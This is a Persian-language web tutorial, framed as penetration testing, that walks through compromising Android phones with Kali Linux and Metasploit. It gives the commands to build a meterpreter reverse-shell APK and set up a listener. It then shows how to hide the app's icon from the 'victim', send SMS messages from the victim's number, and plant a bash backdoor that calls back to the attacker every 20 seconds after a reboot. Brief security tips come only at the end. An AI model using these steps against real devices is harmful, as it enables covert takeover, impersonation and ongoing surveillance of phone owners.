هک اندروید با کالی لینوکس رایگان ویدیو (100% عملی)
در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس می پردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با ما همراه باشید.
هک اندروید و امنیت
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
آموزش هک اندروید با کالی لینوکس
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم ؛ اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد،
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم.
اموزش ویدیو ای هک اندروید و امنیت
Seek% buffered00:00Current time00:00Volume
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید
msfconsole
بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید
use android/meterpreter/reverse_tcp
حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید، دقت داشته باشید در این بخش باید ای پی سرور خود را وارد کنید در صورتی که از سرور استفاده نمی کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در SPY24 قرار داده شده است.
set LHOST 127.0.0.1
و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت 6060 را استفاده میکنیم
set LPORT 6060
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
generate -f raw -o PentestCore.apk
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
use multi/handler
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
نحوه استفاده از meterpreter بعد از نفوذ
استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :
دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .
دستور اول : hide_app_icon
با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.
دستور دوم : check_root
با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟
تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.
دستور سوم : send_sms -d number -t ” body text sms ”
دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور
با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.
نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.
ایجاد بکدور بر روی اندروید قربانی
در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :
/ cd
سپس در این مرحله باید با استفاده از دستور زیر به مسیر sdcard وارد شوید :
cd /sdcard
سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.
upload /root/Desktop/backdoor.sh /sdcard
دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.
در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .
سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :
/ cd
cd /sdcard
در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :
sh lifetime.sh
در نهایت باید با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.
آموزش امنیت و جلوگیری از هک اندروید
برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :
از انتی ویروس های اورجینال اندرویدی استفاده کنید
از نصب برنامه های نامعتبر و کرک شده خود داری کنید
با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
از دریافت برنامه به غیر از پلی استور خود داری کنید
بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد
پایدار باشید.